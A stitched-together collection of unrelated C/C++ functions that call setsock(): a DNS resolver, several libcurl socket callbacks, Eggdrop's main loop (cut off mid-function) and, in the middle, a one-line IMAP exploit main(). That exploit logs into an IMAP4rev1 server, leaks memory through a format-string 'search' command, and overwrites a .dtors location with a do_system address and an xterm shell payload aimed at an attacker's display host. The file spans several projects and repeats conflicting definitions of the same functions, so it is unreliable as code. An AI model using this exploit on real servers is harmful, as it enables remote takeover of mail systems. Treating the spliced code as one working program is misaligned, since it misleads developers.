/*
 * Completion callback for the asynchronous re-read of resolv.conf.
 * When `*d` is set the result is discarded.  `failure` tells whether the
 * reload was triggered by a failing socket; `newres` carries the raw bytes
 * of the libc `_res` state, or a null str when the reader could not be
 * forked.  Any outcome ends with a setsock() call so the resolver socket is
 * re-established as needed.
 */
void
resolv_conf::reload_cb (ref<bool> d, bool failure, str newres)
{
  if (*d)
    return;

  /* The reload has finished, whatever its outcome. */
  nbump = 0;
  reload_lock = false;
  last_reload = timenow;

  if (!newres) {
    warn ("resolv_conf::reload_cb: fork: %m\n");
    setsock (true);
    return;
  }
  if (newres.len () != sizeof (_res)) {
    warn ("resolv_conf::reload_cb: short read\n");
    setsock (true);
    return;
  }

  /* Snapshot the previous nameserver list so a change can be detected
   * after the whole state has been overwritten. */
  char prev_ns[sizeof (_res.nsaddr_list)];
  memcpy (prev_ns, _res.nsaddr_list, sizeof (prev_ns));
  memcpy (&_res, newres, sizeof (_res));

  const bool ns_changed =
    memcmp (prev_ns, _res.nsaddr_list, sizeof (prev_ns)) != 0;
  if (!ns_changed) {
    setsock (failure);
    return;
  }

  warn ("reloaded DNS configuration (resolv.conf)\n");
  /* Point at the last configured server (or 0 when the list is empty). */
  ns_idx = _res.nscount ? _res.nscount - 1 : 0;
  last_reload = timenow;
  setsock (true);
}
/*
 * Handle a packet (or EOF/error, n <= 0) arriving on the UDP or TCP
 * resolver socket.  Locates the outstanding request the answer belongs to
 * and either retries it, escalates it to TCP, or hands it the reply.
 */
void
resolver::pktready (bool tcp, u_char *qb, ssize_t n)
{
  if (n <= 0) {
    /* The socket delivered EOF or an error: drop it and recover. */
    if (!tcp) {
      udpsock = NULL;
      setsock (true);
      return;
    }
    tcpsock = NULL;
    if (!last_resp)
      setsock (true);
    last_resp = 0;
    resend (false, true);
    return;
  }

  last_resp = timenow;
  nbump = 0;

  dnsparse reply (qb, n);
  question q;
  if (!reply.qparse (&q))
    return;
  if (q.q_class != C_IN)
    return;

  /* Find the request this packet answers: same id, same transport, same
   * type and the same name (compared case-insensitively). */
  dnsreq *r = reqtab[reply.hdr->id];
  while (r) {
    if (r->usetcp == tcp && r->type == q.q_type
	&& !strcasecmp (r->name, q.q_name))
      break;
    r = reqtab.nextkeq (r);
  }
  if (!r)
    return;

  if (reply.error && !r->error)
    r->error = reply.error;

  if (r->error == NXDOMAIN) {
    /* NXDOMAIN restarts the request rather than failing it here. */
    r->error = 0;
    r->start (true);
    return;
  }
  if (!r->error && !r->usetcp && reply.hdr->tc) {
    /* Truncated UDP answer: re-issue the same query over TCP. */
    reqtoq.remove (r);
    r->usetcp = true;
    r->xmit (0);
    return;
  }
  r->readreply (r->error ? NULL : &reply);
}
/* Result of the UDP liveness probe.  The probe request is forgotten in all
 * cases; only a timeout (ARERR_TIMEOUT) causes the socket to be re-created.
 * The looked-up host `h` is not used. */
void
resolver::udpcheck_cb (ptr<hostent> h, int err)
{
  udpcheck_req = NULL;
  if (err != ARERR_TIMEOUT)
    return;
  setsock (true);
}
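/* Initialize a new SockInfo structure for socket `s` and register it with
 * the multi handle, so later socket callbacks receive it as `sockp`.
 * `easy` is the transfer the socket belongs to, `action` the CURL_POLL_*
 * events libcurl asked for, `g` the shared GlobalInfo.
 * On allocation failure the socket is left unregistered (the callback is
 * void, so nothing can be reported); previously NULL was dereferenced. */
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g)
{
  SockInfo *fdp = calloc(1, sizeof(SockInfo));
  if(!fdp)
    return;
  fdp->global = g;
  setsock(fdp, s, easy, action, g);
  curl_multi_assign(g->multi, s, fdp);
}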
/* CURLMOPT_SOCKETFUNCTION: libcurl reports which events it wants on socket
 * `s` for transfer `e`.  `cbp` is our GlobalInfo; `sockp` is the int* action
 * slot registered for the socket earlier (null the first time a socket is
 * seen).  Always returns 0. */
static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
  std::cout << std::endl << __PRETTY_FUNCTION__ << " called" << std::endl;
  fprintf(MSG_OUT, "\nsock_cb: socket=%d, what=%d, sockp=%p", s, what, sockp);

  GlobalInfo *const global = static_cast<GlobalInfo *>(cbp);
  int *const action_slot = static_cast<int *>(sockp);
  /* Indexed by the CURL_POLL_* value (NONE..REMOVE are 0..4). */
  static const char *const kWhatStr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };

  fprintf(MSG_OUT, "\nsocket callback: s=%d e=%p what=%s ", s, e, kWhatStr[what]);

  if (what == CURL_POLL_REMOVE) {
    fprintf(MSG_OUT, "\n");
    remsock(action_slot, global);
    return 0;
  }
  if (!action_slot) {
    fprintf(MSG_OUT, "\nAdding data: %s", kWhatStr[what]);
    addsock(s, e, what, global);
    return 0;
  }
  fprintf(MSG_OUT, "\nChanging action from %s to %s", kWhatStr[*action_slot], kWhatStr[what]);
  setsock(action_slot, s, e, what, *action_slot, global);
  return 0;
}
/* CURLMOPT_SOCKETFUNCTION: libcurl reports the events it wants on socket
 * `s` for transfer `e`.  `cbp` is the GlobalInfo, `sockp` the SockInfo
 * registered for the socket (NULL the first time it is seen).
 * Always returns 0. */
static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
  static const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };
  GlobalInfo *global = (GlobalInfo *) cbp;
  SockInfo *info = (SockInfo *) sockp;

  MSG_OUT("socket callback: s=%d e=%p what=%s ", s, e, whatstr[what]);

  if (what == CURL_POLL_REMOVE) {
    MSG_OUT("\n");
    remsock(info);
    return 0;
  }

  if (info == NULL) {
    /* First event for this socket: create its SockInfo. */
    const char *want_read = (what & CURL_POLL_IN) ? "READ" : "";
    const char *want_write = (what & CURL_POLL_OUT) ? "WRITE" : "";
    MSG_OUT("Adding data: %s%s\n", want_read, want_write);
    addsock(s, e, what, global);
    return 0;
  }

  MSG_OUT("Changing action from %d to %d\n", info->action, what);
  setsock(info, s, e, what, global);
  return 0;
}
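/* Register socket `s` (belonging to transfer `easy`) with the multi handle.
 * The heap int holds the current CURL_POLL_* action; libcurl hands it back
 * as `sockp` on later socket callbacks.  On allocation failure the socket is
 * left unregistered instead of writing through a NULL pointer. */
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g)
{
  /* fdp is used to store current action */
  int *fdp = (int *)calloc(1, sizeof(int));
  if (!fdp)
    return;
  setsock(fdp, s, easy, action, g);
  curl_multi_assign(g->multi, s, fdp);
}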
/* CURLMOPT_SOCKETFUNCTION: libcurl reports the events it wants on socket
 * `s` for transfer `e`.  `cbp` is the http_m_global, `sockp` the http_m_cell
 * assigned to the socket (NULL until addsock has run, or after the timeout
 * path has already torn the cell down).  Always returns 0. */
int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
	struct http_m_global *global = (struct http_m_global *)cbp;
	struct http_m_cell *cell = (struct http_m_cell *)sockp;
	const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };

	LM_DBG("socket callback: s=%d e=%p what=%s\n", s, e, whatstr[what]);

	if (what != CURL_POLL_REMOVE) {
		if (cell == NULL) {
			LM_DBG("Adding data: %s\n", whatstr[what]);
			addsock(s, e, what, global);
		} else {
			LM_DBG("Changing action from %s to %s\n",
					whatstr[cell->action], whatstr[what]);
			setsock(cell, s, e, what);
		}
		return 0;
	}

	/* if cell is NULL the handle has been removed by the event callback for timeout */
	if (cell == NULL) {
		LM_DBG("REMOVE action without cell, handler timed out.\n");
		return 0;
	}
	if (cell->evset && cell->ev) {
		LM_DBG("freeing event %p\n", cell->ev);
		event_del(cell->ev);
		event_free(cell->ev);
		cell->ev = NULL;
		cell->evset = 0;
	}
	return 0;
}
/* CURLMOPT_SOCKETFUNCTION: libcurl reports the events it wants on socket
 * `s` for transfer `e`.  `cbp` is the GlobalInfo, `sockp` the SockInfo
 * registered for the socket (NULL the first time it is seen).
 * Always returns 0. */
static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp)
{
  /* Indexed by the CURL_POLL_* value (NONE..REMOVE are 0..4). */
  const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };
  GlobalInfo *global = (GlobalInfo *) cbp;
  SockInfo *info = (SockInfo *) sockp;

  fprintf(MSG_OUT, "socket callback: s=%d e=%p what=%s ", s, e, whatstr[what]);

  if (what == CURL_POLL_REMOVE) {
    fprintf(MSG_OUT, "\n");
    remsock(info);
  } else if (info == NULL) {
    fprintf(MSG_OUT, "Adding data: %s\n", whatstr[what]);
    addsock(s, e, what, global);
  } else {
    fprintf(MSG_OUT, "Changing action from %s to %s\n", whatstr[info->action], whatstr[what]);
    setsock(info, s, e, what, global);
  }
  return 0;
}
/* Notifies about updates on a socket file descriptor.  libcurl reports the
 * events it wants on `curl_soc` for transfer `handle`; `cbp` is the
 * global_info, `sockp` the sock_info registered for the socket (NULL the
 * first time it is seen).  Always returns 0. */
static int sock_cb(CURL *handle, curl_socket_t curl_soc, int what, void *cbp, void *sockp)
{
  static const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" };
  global_info *global = (global_info *)cbp;
  sock_info *soc = (sock_info *)sockp;

  orcout(orcm_debug, "%s handle %p curl_soc %i what %i cbp %p sockp %p\n",
         __PRETTY_FUNCTION__, handle, curl_soc, what, cbp, sockp);
  orcout(orcm_debug, "socket callback: s=%d e=%p what=%s ", curl_soc, handle, whatstr[what]);

  if (what == CURL_POLL_REMOVE) {
    orcout(orcm_debug, "\n");
    remsock(soc, global);
  } else if (soc == NULL) {
    orcout(orcm_debug, "Adding data: %s\n", whatstr[what]);
    addsock(curl_soc, handle, what, global);
  } else {
    orcout(orcm_debug, "Changing action from %s to %s\n", whatstr[soc->action], whatstr[what]);
    setsock(soc, curl_soc, handle, what, global);
  }
  return 0;
}
/* CURLMOPT_SOCKETFUNCTION: every socket event is forwarded straight to
 * setsock() on the Context; the per-socket `actionp` slot is not consulted
 * here.  Always returns 0. */
int sock_cb(CURL *e, curl_socket_t s, int what, Context* c, int* actionp)
{
  TRACE("sock_cb");
  (void)actionp;
  setsock(s, e, what, c);
  return 0;
}
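/* Register socket `s` (belonging to transfer `easy`) with the multi handle.
 * The heap int holds the current CURL_POLL_* action; libcurl hands it back
 * as `sockp` on later socket callbacks.  On allocation failure the socket is
 * left unregistered instead of writing through a NULL pointer. */
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g)
{
  std::cout << std::endl << __PRETTY_FUNCTION__ << " called" << std::endl;
  /* fdp is used to store current action */
  int *fdp = (int *) calloc(1, sizeof(int));
  if (!fdp)
    return;
  setsock(fdp, s, easy, action, 0, g);
  curl_multi_assign(g->multi, s, fdp);
}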
/* Map the libcurl socket `s` to the asio socket tracked in the Context's
 * socket_map_ and apply the requested action `act` to it via the
 * socket-pointer overload.  Sockets not present in the map are ignored. */
void setsock(curl_socket_t s, CURL*e, int act, Context* c)
{
  boost::asio::ip::tcp::socket* asio_sock = c->socket_map_.find(s);
  if (asio_sock)
    setsock(asio_sock, e, act, c);
}
/* Initialize a new SockInfo structure for socket `s` and register it with
 * the multi handle so later callbacks receive it as `sockp`.  g_malloc0
 * aborts on allocation failure, so no NULL check is needed.  The descriptor
 * is wrapped in a GIOChannel, presumably so setsock can attach a GLib
 * watch to it -- verify against setsock. */
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g)
{
  SockInfo *info = g_malloc0(sizeof(SockInfo));
  info->global = g;
  info->ch = g_io_channel_unix_new(s);
  setsock(info, s, easy, action, g);
  curl_multi_assign(g->multi, s, info);
}
/* Create a new IPv4 TCP socket, apply `options` to it through setsock(),
 * and return the descriptor.  Creation failure is fatal(). */
int getsock(int options)
{
  int sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (!(sock >= 0))
    fatal("Can't open a socket at all!", 0);
  setsock(sock, options);
  return sock;
}
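/* Initialize a new sock_info structure for socket `curl_soc` and register it
 * with the multi handle so later callbacks receive it as `sockp`.
 * On allocation failure the socket is left unregistered (the callback is
 * void, so nothing can be reported); previously NULL was dereferenced. */
static void addsock(curl_socket_t curl_soc, CURL *handle, int action, global_info *global)
{
  sock_info *soc = calloc(1, sizeof(sock_info));
  if (!soc)
    return;
  soc->global = global;
  setsock(soc, curl_soc, handle, action, global);
  curl_multi_assign(global->multi, curl_soc, soc);
}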
/*
 * Build the DNS query for request `r` and send it on the UDP socket, or on
 * the TCP socket when the request has been escalated to TCP.  A missing UDP
 * socket or a failed TCP setup goes through setsock() instead; a query that
 * res_mkquery() rejects fails the request with ARERR_REQINVAL.
 */
void
resolver::sendreq (dnsreq *r)
{
  if (!udpsock) {
    setsock (false);
    return;
  }

  ptr<dnssock> sock;
  if (r->usetcp) {
    if (!tcpsock && !tcpinit ()) {
      setsock (true);
      return;
    }
    sock = tcpsock;
  }
  else
    sock = udpsock;

  u_char qb[QBSIZE];
  const int n = res_mkquery (QUERY, r->name, C_IN, r->type,
			     NULL, 0, NULL, qb, sizeof (qb));
  if (n < 0) {
    r->fail (ARERR_REQINVAL);
    return;
  }

  HEADER *const hdr = (HEADER *) qb;
  hdr->id = r->id;
  hdr->rd = 1;

  /* FreeBSD (and possibly other OSes) have a broken dn_expand
   * function that doesn't properly invert dn_comp.  Re-parse our own
   * query and keep the name exactly as it will come back in the reply. */
  {
    dnsparse query (qb, n, false);
    question q;
    if (query.qparse (&q))
      r->name = q.q_name;
  }

  sock->sendpkt (qb, n);
}
/* Create the per-socket bookkeeping record for `sockfd`, apply the
 * requested `action`, and hand the record to the multi handle so it comes
 * back as the socket's private pointer in later callbacks. */
static void addsock( curl_socket_t sockfd, int action, struct tr_web * g )
{
    struct tr_web_sockinfo * info = tr_new0( struct tr_web_sockinfo, 1 );

    dbgmsg( "creating a sockinfo %p for fd %d", info, sockfd );
    setsock( sockfd, action, g, info );
    curl_multi_assign( g->multi, sockfd, info );
}
/* assign a socket to the multi handler: look up the cell owning `easy`,
 * apply `action` to it and register the cell as the socket's private
 * pointer.  A handle without a cell is silently ignored. */
void addsock(curl_socket_t s, CURL *easy, int action, struct http_m_global *g)
{
	struct http_m_cell *cell = http_m_cell_lookup(easy);

	if (cell == NULL)
		return;
	setsock(cell, s, cell->easy, action);
	curl_multi_assign(g->multi, s, cell);
}
/* Create a new IPv4 TCP socket and apply `options` to it through setsock().
 * Returns the descriptor, or the negative socket() result (after logging a
 * warning) when creation fails. */
int getsock(int options)
{
  int sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0) {
    putlog(LOG_MISC, "*", "Warning: Can't create new socket!");
    return sock;
  }
  setsock(sock, options);
  return sock;
}
int main(int argc,char *argv[]){ int sflag=DF_SFLAG; unsigned long do_system_addr=DO_SYSTEM; unsigned long retloc=DTOR_END_ADDR; unsigned long shaddr=SHELL; char host[256]=DEF_STR; int port=PORT; extern char *optarg; int sock,i,r=0; char buf[1024]; char user[256]=DEF_STR; char pass[256]=DEF_STR; char *ptr=NULL; char xhost_ip_buf[256]=XHOST_IP; get_10_ip(xhost_ip_buf); memset((char *)buf,0,sizeof(buf)); memset((char *)user,0,sizeof(user)); memset((char *)pass,0,sizeof(pass)); (void)banrl(); while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ switch(sock){ case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'D': case 'd': do_system_addr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'F': case 'f': sflag=atoi(optarg); break; case 'I': case 'i': memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); get_10_ip(xhost_ip_buf); break; case 'U': case 'u': memset((char *)user,0,sizeof(user)); strncpy(user,optarg,sizeof(user)-1); break; case 'S': case 's': memset((char *)pass,0,sizeof(pass)); strncpy(pass,optarg,sizeof(pass)-1); break; case '?': default: (void)usage(argv[0]); break; } } if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ (void)usage(argv[0]); } fprintf(stdout," [+] make socket.\n"); fprintf(stdout," [+] host: %s.\n",host); fprintf(stdout," [+] port: %d.\n",port); sock=setsock(host,port); re_connt(sock); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"IMAP4rev1")){ fprintf(stdout," [+] OK, IMAP4rev1.\n"); } else { fprintf(stdout," [-] Ooops, no match.\n\n"); close(sock); exit(-1); } memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ 
fprintf(stdout," [+] login completed.\n"); break; } else if(strstr(buf," rejected")){ fprintf(stdout," [-] login failed.\n\n"); exit(-1); } } memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] select success.\n"); break; } else if(strstr(buf," NO SELECT")){ fprintf(stdout," [-] select failed.\n\n"); exit(-1); } } /* get, do_system address */ fprintf(stdout," [+] find do_system address.\n"); memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"|")){ ptr=(char *)strstr(buf,"|"); sscanf(ptr,"|%x|\n",&do_system_addr); } do_system_addr-=DEF_DO_SYSTEM_OFFSET; fprintf(stdout," [+] make exploit code.\n"); fprintf(stdout," [+] retloc address: %p.\n",retloc); fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); fprintf(stdout," [+] send exploit code.\n"); send_exploit_code(sock,retloc,do_system_addr,sflag); for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); } #define LOGOUT_CMD "1 logout\n" send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); sleep(1); recv(sock,buf,sizeof(buf)-1,0); close(sock); if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ fprintf(stdout," [+] logout success.\n\n"); } else { fprintf(stdout," [-] logout failed.\n\n"); exit(-1); } exit(0); }
/*
 * Eggdrop entry point: refuses to run as root, builds the version strings,
 * initialises every subsystem, reads the config, checks the PID file,
 * optionally daemonises, then runs the socket/event loop.  The loop only
 * leaves through fatal()/exit(); this function never returns normally.
 *
 * NOTE(review): the PID-file handle `f` opened below is never fclose()d,
 * and `socket_cleanup` is re-declared inside the loop so its countdown
 * never progresses (see the inline notes).
 */
int main(int argc, char **argv)
{
  int xx, i;
#ifdef STOP_UAC
  int nvpair[2];
#endif
  char buf[520], s[25];
  FILE *f;
#ifndef ENABLE_STRIP
  struct rlimit cdlim;
#endif

  /* Don't allow Eggdrop to run as root. */
  if (((int) getuid() == 0) || ((int) geteuid() == 0))
    fatal("ERROR: Eggdrop will not run as root!", 0);

#ifndef ENABLE_STRIP
  /* Non-stripped builds lift the core-file limit so crashes can be debugged. */
  cdlim.rlim_cur = RLIM_INFINITY;
  cdlim.rlim_max = RLIM_INFINITY;
  setrlimit(RLIMIT_CORE, &cdlim);
#endif

  /* NOTE(review): included inside the function body; its contents are not
   * visible here -- presumably the patch records that feed egg_xtra. */
#include "patch.h"

  /* Version info! */
  egg_snprintf(ver, sizeof ver, "eggdrop v%s", egg_version);
  egg_snprintf(version, sizeof version,
               "Eggdrop v%s (C) 1997 Robey Pointer (C) 2005 Eggheads",
               egg_version);
  /* Now add on the patchlevel (for Tcl).  Both appends are unbounded and
   * rely on egg_version being sized for them. */
  sprintf(&egg_version[strlen(egg_version)], " %u", egg_numver);
  strcat(egg_version, egg_xtra);

#ifdef STOP_UAC
  nvpair[0] = SSIN_UACPROC;
  nvpair[1] = UAC_NOPRINT;
  setsysinfo(SSI_NVPAIRS, (char *) nvpair, 1, NULL, 0);
#endif

  /* Set up error / signal traps. */
  setup_signal_traps();

  /* Initialize a few variables before main loop. */
  cache_miss = 0;
  cache_hit = 0;
  chanset = NULL;
  now = time(NULL);
  egg_memcpy(&nowtm, localtime(&now), sizeof(struct tm));
  lastmin = nowtm.tm_min;

  /* Initialize random number generator.  Seeded from the clock and PIDs
   * only, so random() must not be relied on for anything secret. */
  srandom((unsigned int) (now % (getpid() + getppid())));

  init_mem();
  init_language(1);

  /* Process command line arguments. */
  process_args(argc, argv);

  printf("\n%s\n", version);

  init_dcc_max();
  init_userent();
  logfile_init(0);
  init_bots();
  init_net();
  init_modules();
  if (backgrd)
    bg_prepare_split();
  init_tcl(argc, argv);
  init_language(0);
  help_init();
  traffic_init();
  logfile_init(1);
#ifdef STATIC
  link_statics();
#endif

  /* Turn ctime()'s "Www Mmm dd hh:mm:ss yyyy" into "Www Mmm dd yyyy" by
   * copying the year over the time-of-day field. */
  strncpyz(s, ctime(&now), sizeof s);
  strcpy(&s[11], &s[20]);
  putlog(LOG_ALL, "*", "--- Loading %s (%s)", ver, s);

  /* Read configuration data. */
  readconfig();

  /* Check for encryption module. */
  if (!encrypt_pass) {
    printf(MOD_NOCRYPT);
    bg_send_quit(BG_ABORT);
    exit(1);
  }

  putlog(LOG_MISC, "*", "=== %s: %d channels, %d users.", botnetnick,
         count_channels(), count_users(userlist));

  if (!pid_file[0])
    egg_snprintf(pid_file, sizeof pid_file, "pid.%s", botnetnick);

  /* Check for pre-existing eggdrop! */
  f = fopen(pid_file, "r");
  if (f != NULL) {
    /* NOTE(review): f is never fclose()d on either path below. */
    fgets(s, 10, f);
    xx = atoi(s);
    /* NOTE(review): an empty or non-numeric PID file makes atoi() return 0,
     * and kill(0, ...) signals every process in our own process group.
     * errno is also not cleared first, so a stale ESRCH would be misread as
     * "not running" when kill() itself succeeds. */
    kill(xx, SIGCHLD); /* Meaningless kill to determine if PID is used. */
    if (errno != ESRCH) {
      printf(EGG_RUNNING1, botnetnick);
      printf(EGG_RUNNING2, pid_file);
      bg_send_quit(BG_ABORT);
      exit(1);
    }
  }

  /* Move into background?  On non-Cygwin builds the fork happens in
   * bg_do_split() and only the foreground path writes the PID file here. */
  if (backgrd) {
#ifndef CYGWIN_HACKS
    bg_do_split();
  } else {
#endif
    xx = getpid();
    if (xx != 0) {
      FILE *fp;

      /* Write PID to file. */
      unlink(pid_file);
      fp = fopen(pid_file, "w");
      if (fp != NULL) {
        fprintf(fp, "%u\n", xx);
        if (fflush(fp)) {
          /* Let the bot live since this doesn't appear to be a botchk. */
          printf("Cannot not write to '%s' (PID file).\n", pid_file);
          fclose(fp);
          unlink(pid_file);
        } else
          fclose(fp);
      } else
        printf("Cannot not write to '%s' (PID file).\n", pid_file);
#ifdef CYGWIN_HACKS
      printf("Launched into the background (PID: %d)\n\n", xx);
#endif
    }
  }

  use_stderr = 0; /* Stop writing to stderr now */

  if (backgrd) {
    /* Ok, try to disassociate from controlling terminal (finger cross) */
#if defined(HAVE_SETPGID) && !defined(CYGWIN_HACKS)
    setpgid(0, 0);
#endif
    /* Tcl wants the stdin, stdout and stderr file handles kept open. */
    freopen("/dev/null", "r", stdin);
    freopen("/dev/null", "w", stdout);
    freopen("/dev/null", "w", stderr);
#ifdef CYGWIN_HACKS
    FreeConsole();
#endif
  }

  /* Terminal emulating dcc chat */
  if (!backgrd && term_z) {
    int n = new_dcc(&DCC_CHAT, sizeof(struct chat_info));

    dcc[n].addr = iptolong(getmyip());
    dcc[n].sock = STDOUT;
    dcc[n].timeval = now;
    dcc[n].u.chat->con_flags = conmask;
    dcc[n].u.chat->strip_flags = STRIP_ALL;
    dcc[n].status = STAT_ECHO;
    strcpy(dcc[n].nick, "HQ");
    strcpy(dcc[n].host, "llama@console");
    /* HACK: Workaround not to pass literal "HQ" as a non-const arg */
    dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
    /* Make sure there's an innocuous HQ user if needed */
    if (!dcc[n].user) {
      userlist = adduser(userlist, dcc[n].nick, "none", "-", USER_PARTY);
      dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
    }
    setsock(STDOUT, 0); /* Entry in net table */
    dprintf(n, "\n### ENTERING DCC CHAT SIMULATION ###\n\n");
    dcc_chatter(n);
  }

  then = now;
  online_since = now;
  autolink_cycle(NULL); /* Hurry and connect to tandem bots. */
  add_help_reference("cmds1.help");
  add_help_reference("cmds2.help");
  add_help_reference("core.help");

  /* Create hooks. */
  add_hook(HOOK_SECONDLY, (Function) core_secondly);
  add_hook(HOOK_MINUTELY, (Function) core_minutely);
  add_hook(HOOK_HOURLY, (Function) core_hourly);
  add_hook(HOOK_REHASH, (Function) event_rehash);
  add_hook(HOOK_PRE_REHASH, (Function) event_prerehash);
  add_hook(HOOK_USERFILE, (Function) event_save);
  add_hook(HOOK_BACKUP, (Function) backupuserfile);
  add_hook(HOOK_DAILY, (Function) event_logfile);
  add_hook(HOOK_DAILY, (Function) traffic_reset);
  add_hook(HOOK_LOADED, (Function) event_loaded);

  call_hook(HOOK_LOADED);

  debug0("main: entering loop");
  while (1) {
    /* NOTE(review): declared (and reset to 0) on every iteration, so the
     * "every so often" branch below runs each time and the decrement in
     * its else-branch is never observed. */
    int socket_cleanup = 0;

#ifdef USE_TCL_EVENTS
    /* Process a single Tcl event. */
    Tcl_DoOneEvent(TCL_ALL_EVENTS | TCL_DONT_WAIT);
#endif

    now = time(NULL);
    random();

    /* Every second... */
    if (now != then) {
      call_hook(HOOK_SECONDLY);
      then = now;
    }

    /* Only do this every so often. */
    if (!socket_cleanup) {
      socket_cleanup = 5;

      /* Remove dead dcc entries. */
      dcc_remove_lost();

      /* Check for server or dcc activity. */
      dequeue_sockets();
    } else {
      socket_cleanup--;
    }

    /* Free unused structures. */
    garbage_collect();

    /* sockgets() result, as used below: >= 0 is the socket that produced
     * data in buf, -1 is EOF (socket in i), -2 a select() error, -3 idle. */
    xx = sockgets(buf, &i);
    if (xx >= 0) { /* Non-error */
      int idx;

      for (idx = 0; idx < dcc_total; idx++) {
        if (dcc[idx].sock != xx)
          continue;
        if (dcc[idx].type && dcc[idx].type->activity) {
          traffic_update_in(dcc[idx].type, (strlen(buf) + 1)); /* Traffic stats. */
          dcc[idx].type->activity(idx, buf, i);
        } else {
          /* NOTE(review): this branch is also reached when dcc[idx].type is
           * NULL, in which case ->name dereferences a null pointer. */
          putlog(LOG_MISC, "*", "!!! untrapped dcc activity: type %s, sock %d",
                 dcc[idx].type->name, dcc[idx].sock);
        }
        break;
      }
    } else if (xx == -1) { /* EOF */
      int idx;

      if (i == STDOUT && !backgrd)
        fatal("END OF FILE ON TERMINAL", 0);
      for (idx = 0; idx < dcc_total; idx++) {
        if (dcc[idx].sock != i)
          continue;
        if (dcc[idx].type && dcc[idx].type->eof) {
          dcc[idx].type->eof(idx);
        } else {
          putlog(LOG_MISC, "*", "*** ATTENTION: DEAD SOCKET (%d) OF TYPE %s UNTRAPPED",
                 i, dcc[idx].type ? dcc[idx].type->name : "*UNKNOWN*");
          killsock(i);
          lostdcc(idx);
        }
        /* Leave the loop with idx != dcc_total so the "not a dcc socket"
         * branch below is skipped. */
        idx = dcc_total + 1;
      }
      if (idx == dcc_total) {
        putlog(LOG_MISC, "*", "(@) EOF socket %d, not a dcc socket, not anything.", i);
        close(i);
        killsock(i);
      }
    } else if (xx == -2 && errno != EINTR) { /* select() error */
      putlog(LOG_MISC, "*", "* Socket error #%d; recovering.", errno);
      for (i = 0; i < dcc_total; i++) {
        if ((fcntl(dcc[i].sock, F_GETFD, 0) == -1) && (errno == EBADF)) {
          /* NOTE(review): the "type %d" conversion is given dcc[i].type,
           * which is a pointer (it is dereferenced as ->name above). */
          putlog(LOG_MISC, "*", "DCC socket %d (type %d, name '%s') expired -- pfft",
                 dcc[i].sock, dcc[i].type, dcc[i].nick);
          killsock(dcc[i].sock);
          lostdcc(i);
          i--; /* Re-examine this slot; lostdcc() presumably shifts entries down. */
        }
      }
    } else if (xx == -3) {
      call_hook(HOOK_IDLE);
      socket_cleanup = 0; /* If we've been idle, cleanup & flush */
    }

    if (do_restart) {
      if (do_restart == -2) {
        rehash();
      } else {
        int f = 1;
        module_entry *p;
        Function startfunc;
        char name[256];

        check_tcl_event("prerestart");

        /* Unload as many modules as possible: repeat passes until one
         * unloads nothing.  A module is only a candidate when no entry in
         * dependancy_list still needs it. */
        while (f) {
          f = 0;
          for (p = module_list; p != NULL; p = p->next) {
            dependancy *d = dependancy_list;
            int ok = 1;

            while (ok && d) {
              if (d->needed == p)
                ok = 0;
              d = d->next;
            }
            if (ok) {
              /* NOTE(review): strcpy into name[256] with no length check. */
              strcpy(name, p->name);
              if (module_unload(name, botnetnick) == NULL) {
                f = 1;
                break;
              }
            }
          }
        }

        /* Make sure we don't have any modules left hanging around other than
         * "eggdrop" and the two that are supposed to be. */
        for (f = 0, p = module_list; p; p = p->next) {
          if (strcmp(p->name, "eggdrop") && strcmp(p->name, "encryption") &&
              strcmp(p->name, "uptime")) {
            f++;
          }
        }
        if (f != 0) {
          putlog(LOG_MISC, "*", MOD_STAGNANT);
        }

        /* Flush log files to disk. */
        flushlogs();

        /* Clean up Tcl stuff. */
        kill_tcl();

        /* Initialize stuff again. */
        init_tcl(argc, argv);
        init_language(0);
        help_init();
        traffic_init();
        logfile_init(1);

        /* This resets our modules which we didn't unload (encryption and uptime). */
